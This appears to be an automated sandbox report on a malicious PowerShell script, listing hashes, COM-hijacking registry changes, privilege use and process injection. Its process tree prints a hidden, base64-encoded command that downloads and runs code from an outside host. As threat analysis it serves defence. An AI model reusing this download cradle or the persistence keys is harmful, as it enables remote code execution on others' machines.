Analysis
-
max time kernel
152s -
max time network
130s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
25-08-2021 14:49
Static task
static1
Behavioral task
behavioral1
Sample
work.ps1
Resource
win7v20210410
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
work.ps1
Resource
win10v20210408
windows10_x64
0 signatures
0 seconds
General
-
Target
work.ps1
-
Size
1.4MB
-
MD5
7ba4b5c5d3e3276a3cfe8d581cf7173b
-
SHA1
79ba87b46562e75f097c1b6d23d3b63b9160bbaa
-
SHA256
73737bf28fa00ea1380bf98a76f6c2ff34bf25e8b489750acccc45df8e898022
-
SHA512
ccccc4402edc1c333f2b11955b4c2850f5b68674e473d57521cb009e2047a46f9c57c0151b9191d4a2e3b10931723d0191bba9b299ffb3bb293ff7d6f83598c6
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 14 2080 powershell.exe -
Modifies registry class 9 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\{0205080B-0E11-0003-0609-0C0F12010407}\CLSID powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\{0205080B-0E11-0003-0609-0C0F12010407}\ = "{0205080B-0E11-0003-0609-0C0F12010407}" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\TreatAs\ = "{13020508-0B0E-1100-0306-090C0F120104}" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{13020508-0B0E-1100-0306-090C0F120104} powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\{0205080B-0E11-0003-0609-0C0F12010407} powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\{0205080B-0E11-0003-0609-0C0F12010407}\CLSID\ = "{13020508-0B0E-1100-0306-090C0F120104}" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\TreatAs powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{2DEA658F-54C1-4227-AF9B-260AB5FC3543} powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid Process 804 powershell.exe 804 powershell.exe 804 powershell.exe 2080 powershell.exe 2080 powershell.exe 2080 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 804 powershell.exe Token: SeDebugPrivilege 2080 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 804 wrote to memory of 2080 804 powershell.exe 78 PID 804 wrote to memory of 2080 804 powershell.exe 78
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\work.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080
-